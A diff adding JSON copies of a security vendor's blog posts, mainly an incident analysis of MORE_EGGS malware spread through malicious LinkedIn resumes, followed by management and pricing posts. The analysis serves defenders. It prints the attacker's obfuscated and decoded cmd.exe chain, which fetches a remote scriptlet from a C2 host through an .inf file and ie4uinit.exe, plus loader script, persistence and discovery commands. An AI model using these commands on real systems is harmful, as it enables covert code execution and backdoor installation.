confidence, industry headwinds and tailwinds, and the undercurrent of human emotion that fuels the availability of capital in the first place. In the course of his address, the statement \u201cour product is our stock price\u201d happened to come out. No wait, that was on Silicon Valley . But close enough. Y\u2019know, if you\u2019re a shareholder\u2026 you\u2019re damn right it is. In fact, if you\u2019re at the company primarily because of your equity\u2026 that view is pretty compelling. If the stock price goes up, you win. It\u2019s easy to align around that mission if you\u2019re holding the right cards. But what if you\u2019re not? If you happen to be, say\u2026 on the security team, and your vested interest in the company revolves more around what it does for customers than what it yields to investors, what does that message do for you? If you\u2019re thinking \u201cabsolutely nothing,\u201d it turns out it\u2019s a little worse than that. You\u2019ll come out of that all-hands even less motivated than you were when you walked in. Hearing that your company\u2019s raison d\u2019\u00eatre is about putting dollars into already dollar-laden pockets is simply not a compelling message (or a compelling reason to come to work). 
A message like \u201cwe\u2019re here to keep our customers safe,\u201d or \u201cwe want to level the playing field,\u201d or even \u201cwe\u2019re here to stick our finger in Sauron\u2019s eye or die trying,\u201d\u2026 that\u2019s what you\u2019re there for. Well, that\u2019s great and all, but if you\u2019re in charge of security at a larger company whose mission actually has nothing to do with security, then it falls on you to make sure your team understands that THEIR mission isn\u2019t quite so transactional. Here are four things you can start working on today to set the tone for security in your organization that will have a lasting impact on your team. 1. Check compensation Mission matters, but so do basic financials that allow for a place to live and eat. No, the world is not so simplistic as Maslow would have you believe , but you know as well as I how competitive the security space is. You can\u2019t turn on a cyber Twitter feed without at least three \u201c OMG TALENT SHORTAGE \u201d headlines scrolling by these days. Over-dramatized clickbait as it may be, your security staff can likely get a job somewhere else and make more money at any point. Get access to market data and make sure you, your boss, and your HR team are educated on the realities of the security talent pool. 2. Define your mission and vision Why do you exist? What exactly are your doing for your customers? How do you know when you\u2019re successful? There\u2019s no end of information about how to establish these so I\u2019m not going to rehash that here, but it\u2019s worth taking time out of your day, and with the support of your team, to ensure everyone is aligned on these two statements. 3. Check your culture The #1 pitfall of mission/vision efforts at any company is not letting the words you write down alter behavior. Netflix captures this best in their deliberate, documented approach to culture. Do your decisions align with your culture? Do they align with your mission, and will they help you achieve your vision? \u201cMany companies have value statements, but often these written values are vague and ignored. The real values of a firm are shown by who gets rewarded or let go.\u201d \u2013 Netflix 4. Tell stories It may feel a bit weird to jump from b-school propaganda to your kids\u2019 pre-bedtime activities, but being able to tell a great story is an essential part of management in general\u2026 and especially important in high-stress, high-impact work like security analysis and incident response. Not only do stories allow your security team to relive and celebrate their achievements ( versus pushing happiness past the cognitive horizon ), it builds credibility across the organization and reminds everyone what they\u2019re working for. One step at a time Realistically, there\u2019s no shortage of work for you to tackle. Taking a step back to focus on something as high level as mission or vision might look like a waste of time. For some, \u201cdealing with HR\u201d is a trial unto itself that you\u2019ll want to put off as long as possible. If nothing else, you probably already have a staff meeting every week. Next week, add a story. If a particularly good one pops up, find a way to share it with teams outside your organization. Get a few wins under your belt and build up the energy to tackle some of the higher level (but likely more impactful) work of 1 \u2013 3. Best of luck! \u2014 This is the third part of a five part series on key areas of focus to improve security team retention. 
Read from the beginning, 5 ways to keep your security nerds happy , or continue to part four ." +} \ No newline at end of file diff --git a/mistakes-to-avoid-when-measuring-soc-performance.json b/mistakes-to-avoid-when-measuring-soc-performance.json new file mode 100644 index 0000000000000000000000000000000000000000..abbd817d32eeedaf3e290bab06916af1c7011371 --- /dev/null +++ b/mistakes-to-avoid-when-measuring-soc-performance.json @@ -0,0 +1,6 @@ +{ + "title": "Mistakes to avoid when measuring SOC performance", + "url": "https://expel.com/blog/mistakes-avoid-measuring-soc-performance/", + "date": "Sep 27, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Mistakes to avoid when measuring SOC performance Security operations \u00b7 4 MIN READ \u00b7 JUSTIN BAJKO \u00b7 SEP 27, 2017 \u00b7 TAGS: Management / Metrics / SOC \u201cWhat gets measured gets managed.\u201d I heard this line repeated like a mantra early in my career whenever a new metrics program was being introduced in our security operations center (SOC). Unfortunately, nobody handed out magnifying glasses. That would have been helpful to read the six-point font metric-filled spreadsheet once it was printed out. We measured everything every manager could think to measure. The result? Our metrics improved but our outcomes didn\u2019t. For example, instead of taking the time to troubleshoot device outages when an associated ticket hadn\u2019t been updated in a week, employees started simply updating the tickets with lines that said, \u201cDevice still not connected,\u201d and moving on because they were being measured on the number of tickets worked. And this is the problem when you\u2019re developing your first set of operational metrics. If you\u2019re not thoughtful about the things that you measure and why you\u2019re measuring them, you can end up managing to the wrong outcomes. So, why do companies get it wrong so frequently? It\u2019s not that they\u2019re measuring the wrong things. Most often, companies are measuring the \u201cright thing,\u201d but they\u2019re doing it in the wrong way or for the wrong reasons. Here are the three most common mistakes I see companies make when they start measuring their SOC\u2019s performance. 1. Counting all the things Let\u2019s start with these statements. Which do you think is better? \u201cWe detected three more incidents this month! Success!\u201d vs. \u201cWe had three fewer incidents this month! Success!\u201d How do you know what the right number is? More important, do you know why you\u2019re counting these things in the first place? Are you concerned that you\u2019re missing things? If so, it probably makes sense to focus on uncovering more incidents. If you\u2019re focused on making your organization more resilient to attacks and you\u2019ve spent a lot of effort on prevention, then it\u2019s reasonable to want to see a reduction in the total number of incidents. Either way, it\u2019s important to realize that the outcome you\u2019re trying to achieve can change, so using a metric like this by itself and without context is rife with risk. Another popular metric is the aggregate number of alerts in \u201cLow,\u201d \u201cMedium,\u201d \u201cHigh,\u201d and \u201cCritical\u201d severity buckets. Let\u2019s face it, \u201cCritical\u201d is what gets all the airtime. But watch out for misaligned objectives when it comes to severity. 
It\u2019s easy to perceive more value as you find more \u201csuper bad\u201d things But it\u2019s easy for people to game the system when you look at things through this lens. Non-severe alerts start to get artificially dispositioned as critical and it can distract your team from real problems. Finally, counting things for the sake of counting things can be bad for your team. People don\u2019t like being measured for reasons they don\u2019t understand or on things they perceive to be wrong. And believe me, they\u2019ll know it\u2019s wrong well before you do. If your team feels like they\u2019re spending their time on the wrong things or being evaluated in the wrong way, they\u2019ll leave. 2. Faster is always better Speed is important when it comes to detecting and responding to threats. After all, if you\u2019re too slow, one compromised laptop can quickly spiral into an event where your most valuable data walks out the front door. But measuring people and processes based on speed alone can result in the wrong behavior. It can lead to quality issues \u2014 and yet again \u2014 drive people to game the system. Requiring your analysts to complete an investigation in 10 minutes sounds fine on the surface, but if you constrain an analyst\u2019s ability to actually dig into an incident and find out what\u2019s really going on for the sake of time, you\u2019re likely to miss critical details and negatively impact your response to that incident. 3. More money, more tools! (or is it less money, fewer tools?) Everyone has a budget. And everyone gets measured on how they spend against that budget. That\u2019s not going to change any time soon, and I\u2019m not advocating for it to change. However, spending less doesn\u2019t necessarily mean you\u2019re being a savvy spender. Likewise, spending more doesn\u2019t automatically make you more mature. Cutting costs in the wrong areas can create visibility issues, make you more vulnerable, and ultimately create a level of risk that\u2019s far greater than the business truly understands. To complicate matters, if your cost cutting decreases your visibility, that\u2019ll make it even harder to calculate risk for the business. But the flip side isn\u2019t exactly the promised land, either. Collecting all the latest cutting-edge security hotness that you heard about at RSA often does more harm than good. When you buy a new security tool, you need to have a plan for how you\u2019re going to use it: you need to understand what problem you have that this tool is supposed to solve, your team needs to know how to use it, and you guessed it, you need to know how you\u2019re going to measure its performance. What\u2019s the impact of throwing money at cool new technology without understanding how it fits into your organization? Oddly enough, it\u2019s similar to what happens when you try to cut costs without a plan \u2013 reduced visibility, increased vulnerability, and potentially increased risk to your environment. And don\u2019t forget: how budgets get spent and what products to buy next are decisions that are often heavily influenced by what you\u2019re measuring. If you\u2019re measuring the wrong things, you allocate resources incorrectly and the vicious cycle continues. So, what now? Okay. I\u2019ve spent a good bit of time talking about some of the most common mistakes that I see when organizations start to measure the performance of their SOC. 
Hopefully, I\u2019ve whet your appetite to hear about some of the innovative things I\u2019ve seen organizations do to effectively measure their SOC\u2019s performance. Stay tuned for our next post on this subject." +} \ No newline at end of file diff --git a/month-to-month-pricing-in-uncertain-times.json b/month-to-month-pricing-in-uncertain-times.json new file mode 100644 index 0000000000000000000000000000000000000000..a212493fd35ee7873054ce31d949a7005b16f54b --- /dev/null +++ b/month-to-month-pricing-in-uncertain-times.json @@ -0,0 +1,6 @@ +{ + "title": "Month-to-month pricing in uncertain times", + "url": "https://expel.com/blog/month-to-month-pricing/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Month-to-month pricing in uncertain times Security operations \u00b7 1 MIN READ \u00b7 MATT PETERS \u00b7 APR 3, 2020 When we founded Expel nearly four years ago, we set out to provide our customers with greater peace of mind about security \u2013 whether they\u2019re operating \u201cbusiness as usual\u201d or facing more challenging circumstances. There\u2019s plenty of uncertainty in our world right now, which is why we\u2019re introducing a new way for new customers to get 24\u00d77 security monitoring and response from us: monthly pricing for the first year. Starting today, you can sign up for Expel 24\u00d77 monitoring, pay us monthly for the first year and give us 30 days\u2019 notice if you need to cancel. Sound easy? That\u2019s because it is. Whether you need some extra support while your security and IT teams go remote, want to focus on more urgent security priorities or just aren\u2019t in a position to make an annual commitment \u2013 we\u2019re committed to helping you quickly address your unique challenges in a way that works best for you. You\u2019ve probably got questions \u2026 We get it. We\u2019ve tried to keep things simple and, of course, transparent. How does this new pricing option work? In short, you pay for Expel service on a monthly basis (as opposed to an annual one) during the first year. If you want to cancel any time during the first year, just give us 30 days\u2019 notice. After the first 12 months of service, the contract converts to an annual contract paid in advance. How much does it cost? When you choose an annual contract, it\u2019s 15% less than the first-year-monthly pricing. You can see actual pricing on our pricing page . Why are you doing this? We know many orgs are facing difficult times. We want to help reduce anxiety. We think this can help: Organizations that need short-term coverage over the next few months Organizations with uncertain budgets that can\u2019t commit to a 12-month contract right now Organizations with new pandemic-related purchasing hurdles introduced into their buying processes, but want to get started right away Do I get the same service that customers on annual billing cycles are getting? Yep! The service is exactly the same. Anything else I should know? The pricing option is only available for contracts signed by September 30th, 2020. You can read the nitty gritty terms and conditions right here. Want to hear more? We\u2019d love to talk with you. Send us a note!" 
+} \ No newline at end of file diff --git a/more-eggs-and-some-linkedin-resume-spearphishing.json b/more-eggs-and-some-linkedin-resume-spearphishing.json new file mode 100644 index 0000000000000000000000000000000000000000..ae7a66cbe71720c60f73646d855942789b1364a7 --- /dev/null +++ b/more-eggs-and-some-linkedin-resume-spearphishing.json @@ -0,0 +1,6 @@ +{ + "title": "MORE_EGGS and Some LinkedIn Resum\u00e9 Spearphishing", + "url": "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing/", + "date": "Aug 25, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG MORE_EGGS and Some LinkedIn Resum\u00e9 Spearphishing Security operations \u00b7 14 MIN READ \u00b7 KYLE PELLETT AND ANDREW JERRY \u00b7 AUG 25, 2022 \u00b7 TAGS: MDR The \u201cGreat Resignation\u201d has recruiters working overtime scouring LinkedIn resum\u00e9s for potential candidates. Unfortunately, some of these resum\u00e9s are posted by bad actors taking advantage of the situation. With a new twist on the MORE_EGGS family of malware, attackers are throwing their names in the ring by submitting poisoned resum\u00e9s to job recruiters . The Expel SOC recently spotted a deployment of this technique. The victim\u2019s computer was infected and the malware payload tried to exfiltrate data within a few minutes. How we spotted our initial lead So, to be honest, malware sometimes acts so quickly that multiple alerts sound before one of our analysts can start the triage process. As you\u2019d imagine, we\u2019re automatically suspicious when we see multiple alerts fire for the same activity. It tells us that something strange is happening. In this case, we received seven unique Microsoft Defender for Endpoint alerts within a few seconds for activity that clearly (for reasons explained below) resembled malicious code execution. This tipped our SOC analysts to an attack that was well under way \u2014 action to contain the host was needed urgently. After this type of malware gains initial access \u2014 even if partially blocked by existing security controls \u2014 the attack can spread quickly and deploy code execution , defense evasion , and command and control techniques (in this case the answer was D \u2014 all of the above). This is why a detection strategy that covers all parts of the MITRE ATT&CK framework is so important. In this case, Defender for Endpoint caught the use of XSL Script Processing first. Cybersecurity is sometimes a battle of humans vs computers, and humans have the disadvantage with respect to time. A lot can happen in one \u201ccomputer second,\u201d and tech like the Expel Workbench\u2122 and Ruxie\u2122 help level the field by transforming alert data into intel our SOC analysts can quickly respond to while an attack is under way. (More on how we use Defender\u2019s features to our advantage here .) Let\u2019s take a look at one of several Microsoft Defender for Endpoint alerts we received, how the Expel Workbench helped guide our analysts to find important information quickly, and how we inferred that this attack was in progress. Can you spot the evil here? Here\u2019s what we saw in the recent process activity: We see regsvr32 attempting to execute 42981.ocx , which is similar to a technique used by malware (such as QBot and Lokibot ). This is a pretty good giveaway that some malicious code has been executed; it\u2019s written this 42981.ocx file to disk, and has now called regsvr32 to run whatever code lies within this DLL file. 
The process arguments of cmd.exe are heavily obfuscated , an indication of an attacker trying to evade detection. One thing that isn\u2019t obfuscated is johndoe[.]com/kbvbskrvf , a likely suspect for a command and control IOC. This alert is looking for discovery activity or \u201cSuspicious sequence of exploration activities.\u201d We see this in the command cmd /v /c nltest /trusted_domains outputting to a text file in a temporary directory, which is consistent with identifying domains trusted by this host \u2014 quite unusual if you ask us. msxsl.exe is a deprecated XML parsing tool with a well documented use case for executing code and bypassing application controls \u2014 here we see it trying to run an obscurely named text file. We also observe wmic creating the process ie4uinit.exe -basesettings . This is another LOLBAS (living off the land binary, script, or library) like msxsl.exe that can easily execute code because it can execute commands from a specially prepared ie4uinit.inf file. Okay, so a lot of bad stuff going on\u2026and so far, not a lot of answers to how this happened. At this point, we declared an incident, notified our customer, and sent them remediation actions to contain the host and block communications with johndoe[.]com (Side note: This is not the real C2 we observed, but in the interest of protecting the anonymity of the user the attackers impersonated, we refer to them as johndoe for this blog.) Identifying the root cause The next question we wanted to answer: How did this malware infection get here? We used the customer\u2019s EDR tool to review the timeline and walk back through the chain of events that ultimately led us to an event involving Outlook.exe. OUTLOOK.EXE opened the http link hxxps://www.linkedin[.]com/e/v2?e=-1swgqb-l437ev7b-v3&lipi=urn%3Ali%3Apage%3Aemail_email_jobs_new_applicant_01%3Bgo6DX7fyT96rJM8b2IE8Fw%3D%3D&t=plh&ek=email_jobs_new_applicant_01&li=0&m=email_jobs_new_applicant&ts=job_posting_download_resume&urlhash=quvr&url=https%3A%2F%2Fwww%2Elinkedin%2Ecom%2Ftalent%2Fapi%2FtalentResumes%3FapplicationId%3D10266114276%26tokenId%3D2155098668%26checkSum%3DAQGkxf8BsoxNsmZdzes9P0qm-HMeqGo9oXk The user clicked on a link in an email from a legitimate sender to a legitimate domain; based on the requested resource, it appears they were seeking a resum\u00e9 for a job posting. This is interesting for a couple of reasons. The attackers evaded inbox malspam detection using a legitimate email sender The document is likely expected, based on a job posting created by the targeted user The link in the email also appears legitimate Unfortunately, our target still fell prey to a malicious phishing document. So what happens if the victim clicks through to download the resum\u00e9 from LinkedIn? To find out, we followed the trail and discovered a PDF crafted to present the viewer with an error. The error is actually an attempt to lure the victim to an unsafe site where they can download General-Manager-resum\u00e9.docx (the file is presented as a Word document). Of course, this is suspicious to us because we know what happens. But an everyday user recruiting from LinkedIn has probably seen resum\u00e9s that aren\u2019t compatible with their software. This seems to be what the attackers are counting on. Notably, the domain johndoe[.]com aligns with what the recruiter expects to see based on the applicant\u2019s name. (It was later discovered that the victim was in fact a recruiter and wasn\u2019t aware of a problem with their host after following this funnel.) 
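As an aside, here\u2019s a minimal sketch of our own (not from the original investigation) showing how an analyst can unwrap the percent-encoded url parameter that redirect links like the one above carry, to see where a \u201cdownload resum\u00e9\u201d click actually leads. The link value below is a shortened, hypothetical stand-in.
from urllib.parse import urlparse, parse_qs, unquote

# hypothetical, truncated stand-in for the LinkedIn redirect link shown above
redirect_link = 'https://www.linkedin.com/e/v2?t=plh&url=https%3A%2F%2Fwww%2Elinkedin%2Ecom%2Ftalent%2Fapi%2FtalentResumes'

# parse_qs splits the query string and percent-decodes each value once
params = parse_qs(urlparse(redirect_link).query)
for embedded in params.get('url', []):
    print(unquote(embedded))  # any leftover encoding is decoded here
The same parse-and-decode step works for most tracking or redirect wrappers that stuff the real destination into a query parameter.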
What happened to the host? So what happens when the user clicks on the .docx link? Well, as it turns out, a bunch of things (before the user is finally presented with a word document). First of all, the file that lands on the victim\u2019s disk is actually a zip archive by the same name \u4e00 General Manager Resume 1.zip. Once the zip is written to disk, we immediately see it create John Doe CV.lnk. At this point we see a familiar code execution from one of our alerts: Obfuscated \"cmd.exe\" /v /c set \"979113wEX=set\" && call set \"979113gn=%979113wEX:~0,1%\" && (for %p in (c) do @set \"979113QCH=%~p\") && !979113gn!et \"979113XI=e\" && !979113gn!!979113XI!t \"979113rKw=$w\" && s!979113XI!t \"979113bCj=i\" && set \"979113FL=a\" && s!979113XI!t \"979113jnI=t\" && !979113gn!et \"979113pHq=d\" && s!979113XI!t \"979113mJ=.\" && s!979113XI!t \"979113MAn=init\" && set \"979113TQ=s!979113bCj!\" && s!979113XI!t \"979113Jq=s!979113XI!tt!979113bCj!ngs\" && s!979113XI!t \"979113Pnd=.!979113bCj!nf\" && set \"979113PN=i!979113XI!u!979113MAn!!979113Pnd!\" && s!979113XI!t \"979113ED= = \" && !979113gn!et \"979113AS=s!979113bCj!gnatur!979113XI!!979113ED!\" && s!979113XI!t \"979113vY=all!979113mJ!win\" && set \"979113ixY=de\" && s!979113XI!t \"979113Dtp=ch\" && call !979113gn!!979113XI!t \"979113YM=C:UsersAppDataRoamingM!979113bCj!crosoft\" && s!979113XI!t \"979113nT=!979113YM!!979113PN!\" && set \"979113of=\"^\" && (for %h in (\"[vers!979113bCj!on]\" \"!979113AS!!979113rKw!!979113bCj!ndows nt$\" \"[!979113ixY!stinationdirs]\" \"F00BE!979113ED!01\" \"[!979113ixY!faultinst!979113vY!dows7]\" \"UnRegist!979113XI!rOCXs!979113ED!3DF1\" \"!979113pHq!elfiles!979113XI!F00BE\" \"[3DF1]\" \"%11%scRo%979113yd%j,NI,%979113RHZ%%979113BCS%%979113BCS%p%979113zL%%979113rf%%979113rf%johndoe.com/kbvbskrvf\" \"[F00BE]\" \"ieu%979113GjL%!979113Pnd!\" \"[strings]\" \"979113GjL=!979113MAn!\" \"979113BCS=t\" \"servicename' '\" \"979113RHZ=h\" \"979113zL=:\" \"979113rf=/\" \"shorthvcname= \" \"979113FPK=com\" \"979113yd=b\") do @e!979113Dtp!o %~h)>\"!979113nT!\" && set \"979113jgm=ie4uinit.exe\" && call copy /Y C:windowssystem32!979113jgm! \"!979113YM!\" > nul && st!979113FL!rt \"\" /MIN wm!979113bCj!c proc!979113XI!ss call cr!979113XI!ate \"!979113YM!!979113jgm! -bas!979113XI!!979113Jq!\" Deobfuscated \"cmd.exe\" /v /c (for h in (\"[version]\" \"signature = $windows nt$\" \"[destinationdirs]\" \" 01 = 01\" \"[defaultinstall.windows7]\" \"UnRegisterOCXs = 3DF1\" \"delfileseF00BE\" \"[3DF1]\" \"11scRobj,NI,http://johndoe.com/kbvbskrvf\" \"[F00BE]\" \"ieuinit.inf\" \"[strings]\" \"init=init\" \"t=t\" \"servicename' '\" \"h=h\" \":=:\" \"/=/\" \"shorthvcname= \" \"979113FPK=com\" \"b=b\") do @echo ~h)>\"C:UsersAppDataRoamingMicrosoft.infieuinit.inf\" && set \"ie4uinit.exe=ie4uinit.exe\" && call copy /Y C:windowssystem32ie4uinit.exe \"C:UsersAppDataRoamingMicrosoft\" > nul && stirt \"\" /MIN wmic process call create \"C:UsersAppDataRoamingMicrosoftie4uinit.exe -basesettings\" This command accomplishes a few things. It: points to http://johndoe[.]com/kbvbskrvf, a malicious resource hosted on the C2 domains UnRegisterOCXs to fetch and run the malicious resource using scrobj writes it as the file \u201cieuinit.inf\u201d and puts it in C:UsersAppDataRoamingMicrosoft.infieuinit.inf copies the legitimate ie4uinit.exe from C:windowssystem32ie4uinit.exe and uses WMIC to create the process in C:UsersAppDataRoamingMicrosoftie4uinit.exe This is indicative of the fileless malware execution technique used by GANDCAB, described here . 
(Further credit to the BOHOPS description of misuse of .inf files, UnRegisterOCXSection and scrobj.dll.) Even though ie4uinit.exe is a legitimate Windows binary and no vendors have flagged its hash as malicious, its occurrence outside the normal/expected path raises suspicions. According to VirusTotal, the file isn\u2019t signed, but appears to be copyrighted by Microsoft and is a component of Internet Explorer. Within a millisecond of execution of the obfuscated cmd.exe process, we see the following wmic process. wmic process call create \"C:UsersAppDataRoamingMicrosoftie4uinit.exe -basesettings\" Another signed binary, msxsl.exe, is also placed in the AppdataRoaming directory. The attackers now have two signed binaries at their disposal in an unprotected location: C:UsersAppDataRoamingMicrosoftmsxsl.exe. Both ie4uinit.exe and msxsl.exe were placed in AppdataRoaming for later use. All of this happened in seconds \u2014 while the victim was waiting for the resum\u00e9 to load \u2014 and we see one more command before the victim is presented with a Word doc (the decoy resum\u00e9). The signed binary is in an unusual location \u2014 C:UsersAppDataRoamingMicrosoftie4uinit.exe \u2014 and is using wmic to adjust token privileges to allow the following privileges to the user\u2019s access token: Shutdown, Undock, IncreaseWorkingSet, TimeZone. This was followed by the execution of a script by ie4uinit.exe out of AppDataRoaming. The following AMSI content was recorded. See Appendix A: At first glance, this looks like obfuscated JavaScript with function calls containing the following human-readable operations: return String.fromCharCode return new ActiveXObject return Math.floor(Math.random() * 65536 .writeText .saveToFile {if (typeof WScript === \u2018object\u2019) {return true; RegRead GetObject .Create Without completely deobfuscating this, we can guess the intent is to run a function after obfuscating the data with String.fromCharCode. This works by naming hexadecimal values as Unicode values, which are finally converted to characters. Here\u2019s the slightly deobfuscated pretty version: See Appendix B: The script then takes the string and writes an ActiveXObject with what\u2019s expected to be a WScript file: lgnsyjcm9801.saveToFile(lgnsyjcm4315); lgnsyjcm9801.close(); lgnsyjcm963 = 1; } catch (lgnsyjcm265) { return 0; } return lgnsyjcm963; } function lgnsyjcm400() { try { lgnsyjcm0147.lgnsyjcm786; return true; } catch (lgnsyjcm27) { if (typeof WScript === \"object\") { We then see an attempt at some cryptographic function based on the presence of return Math.floor(Math.random() * 65536 . Open-source intelligence suggests this function is generating a pseudo-random number either used for C2 traffic encryption or as a GUID to uniquely identify the machine for eventual extortion or ransomware reasons.
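To make the String.fromCharCode trick described above a bit more concrete, here\u2019s a tiny illustration of our own (the character codes are hypothetical, not pulled from the sample). Each numeric code maps back to a single character, so readable strings only exist at runtime:
# decoding a list of character codes the same way String.fromCharCode would
char_codes = [0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f]  # hypothetical values
decoded = ''.join(chr(code) for code in char_codes)
print(decoded)  # -> http://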
There\u2019s also evidence of an intended registry-read event: function lgnsyjcm206() { var lgnsyjcm681; var lgnsyjcm4718; try { lgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656(\"EdT:2)?+6**kP>Yj\", lgnsyjcm8, lgnsyjcm4)); lgnsyjcm4718 = lgnsyjcm681.RegRead(lgnsyjcm2656(\"rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I>(,I5,dv&KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE\", lgnsyjcm8, lgnsyjcm4)); if (!lgnsyjcm4718) { return false; } This can be deobfuscated further, but the next event we see on the host is the decoy document being created and executed using wmi: Script content: IWshShell3.Environment(\"PROCESS\"); IWshEnvironment.Item(\"APPDATA\"); _Stream.Open(); _Stream.Position(\"0\"); _Stream.Type(\"2\"); _Stream.Charset(\"437\"); _Stream.WriteText(\"\u2568\u2567\u03b1\u00ed\u2592\u00df\"); _Stream.SaveToFile(\"C:UsersAppDataRoamingMicrosoft6222.doc\"); The user is now presented with a Word document, and nothing appears unusual. Thanks to AMSI content, we can see the 6222.doc file was executed and an ocx file is created. Script Content: IWshShell3.Environment(\"PROCESS\"); IWshEnvironment.Item(\"APPDATA\"); _Stream.Open(); _Stream.Position(\"0\"); _Stream.Type(\"2\"); _Stream.Charset(\"437\"); _Stream.WriteText(\"\u2568\u2567\u03b1\u00ed\u2592\u00df\"); _Stream.SaveToFile(\"C:UsersAppDataRoamingMicrosoft6222.doc\"); _Stream.Close(); IWshShell3.RegRead(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp PathsWinword.exe\"); ISWbemServicesEx.Get(\"Win32_Process\"); ISWbemObjectEx._01000001(\"C:Program FilesMicrosoft OfficeRootOffice16WIN\", \"Unsupported parameter type 00000001\", \"Unsupported parameter type 00000001\", \"0\"); _Stream.Open(); _Stream.Position(\"0\"); _Stream.Type(\"2\"); _Stream.Charset(\"437\"); _Stream.WriteText(\"MZ\u00c9\"); _Stream.SaveToFile(\"C:UsersAppDataRoamingMicrosoft42981.ocx\") 42981.ocx is now executed by regsrv32.exe, a common tactic used by malicious Word document authors. Script Content: Win32_Process.GetObject(); SetPropValue.CommandLine(\"C:Program FilesMicrosoft OfficeRootOffice16WINWORD.EXE \"C:UsersAppDataRoamingMicrosoft6222.doc\"\"); SetPropValue.CurrentDirectory(\"Unsupported parameter type 00000001\"); SetPropValue.ProcessStartupInformation(\"Unsupported parameter type 00000001\"); Win32_Process.ExecMethod(Create); Win32_Process.GetObject(); SetPropValue.CommandLine(\"regsvr32 /s /n /i:Login \"C:UsersAppDataRoamingMicrosoft42981.ocx\"\"); After executing the .ocx file with regsvr32 we see a registry modification that appears to be a text file in the AppData directory. While we don\u2019t have the contents of the text file, we can assume this is a persistence mechanism. \"Registry Key: S-1-12-1-3569878806-1151277312-3324287152-3804517278Environment Value Name: UserInitMprLogonScript Value Data: cscripT -e:jsCript \"\"%APPDATA%Microsoft46BA2C64FFD9F546.txt\"\" Value Type: RegistryValueEntity\" Regsvr32 also launches the msxsl.exe dropped by the malware to execute the file FC22A0E0F890CC.txt. \"Script Content: Win32_Process.GetObject(); SetPropValue.CommandLine(\"\"C:UsersAppDataRoamingMicrosoftmsxsl.exe FC22A0E0F890CC.txt FC22A0E0F890CC.txt\"\"); After this we see evidence of discovery commands being executed via wmi by the parent process msxsl.exe. Without the contents of the .txt file we can\u2019t really know for sure what\u2019s happening. But based on OSINT, we can speculate that the .txt file is the MORE_EGGS JScript because it behaves like MORE_EGGS. If you\u2019re wondering why we didn\u2019t do further analysis \u2026 good question. 
We were hindered a bit without file acquisition and were limited to host timelines. Microsoft Defender for Endpoint did a pretty good job of recording. msxsl.exe executed the WMI query 'SELECT Version FROM CIM_Datafile Where Name = 'C:\\windows\\notepad.exe'' msxsl.exe executed the WMI query 'SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True' msxsl.exe executed the WMI query 'SELECT * FROM Win32_Process' typeperf.exe \"SystemProcessor Queue Length\" -si 180 -sc 1 Following some system discovery activity, we see HTTP POSTs to the C2 domain webdirectoryuk[.]com. See Appendix C. The wmi process then executes the cmd.exe command under the victim\u2019s user context to run the nltest command to identify trusted domains and write the output to a text file. This was the final action performed by the malware prior to host containment. cmd /v /c nltest /trusted_domains > \"C:UsersAppDataLocalTemp55337.txt\" 2>&1 Based on open source intelligence research, we suspect 55337.txt is the MORE_EGGS backdoor. This blog explains the capability of this backdoor, which includes command execution \u201cvia cmd.exe /C\u201d among other functionality: d&exec \u2013 Download and execute an executable (.exe or .dll). more_eggs \u2013 Delete the current More_eggs and replace it. Gtfo \u2013 Uninstall activity. more_onion \u2013 Execute a script. via_c \u2013 Run a command using \u201ccmd.exe /C\u201d. Unfortunately, we were unable to acquire any of the files we described. However, given the behaviors performed on the host we were able to tell the story of how a LinkedIn resum\u00e9 phishing document resulted in a MORE_EGGS backdoor. Even without acquiring the file, our analysis of the activity aligns with the financially motivated cybercrime gangs FIN6, Evilnum, or the Cobalt Group. It\u2019s difficult to attribute activity to a specific group, but we saw LinkedIn used in 2021 to deliver MORE_EGGS \u2014 with one key difference. The first iteration of threat groups harnessing LinkedIn for this purpose was an inverse of the victim-attacker relationship. Instead of recruiters expecting resum\u00e9s, the FIN6 group was posing as employers and sending fake job offers to their victims over LinkedIn. Based on their prior use of LinkedIn, it\u2019s quite possible this is the work of FIN6 or a copycat. Either way, credit should be given where due. Financially motivated threat actors aren\u2019t playing around and the victim user this article was based on wasn\u2019t aware that downloading a resum\u00e9 from LinkedIn left a backdoor on their machine. Summary of attack lifecycle: Remediation: Initial remediation focused on stopping the bleeding, containing the host, and reimaging the box to a known good image, ensuring no remnants were left over. We also recommended blocking the C2 domain webdirectoryuk[.]com. Resilience: Even though we detected and reported this incident quickly, the bottom line is that malicious code executed on one of our customer-managed devices on their network. Whenever we can directly point to environment controls to enable defenders or disrupt attackers, we include them in the incident findings report. In this incident we provided the customer with the following resilience actions: Disrupt attackers: Phishing education for users, specifically from trusted sources (LinkedIn). Configure Jscript (.js, .jse), Windows Scripting Files (.wsf, .wsh) and HTML for application (.hta) files to open with Notepad. By associating these file extensions with Notepad you mitigate common remote code execution techniques.
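If you want to check where those script extensions currently point, here\u2019s a rough, Windows-only sketch of our own (not part of the incident report or the customer guidance) that reads the machine-wide default handler for each one. Anything resolving to wscript.exe or mshta.exe will execute on double-click, while notepad.exe will simply display the file:
import winreg

# look up the ProgID for each extension, then the command its open verb runs
for ext in ('.js', '.jse', '.wsf', '.wsh', '.hta'):
    try:
        prog_id = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, ext)
        command = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, prog_id + r'\shell\open\command')
        print(ext, '->', command)
    except OSError:
        print(ext, '-> no handler registered')
Keep in mind that per-user defaults chosen through Explorer can override these machine-wide associations, so treat the output as a starting point rather than the final word.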
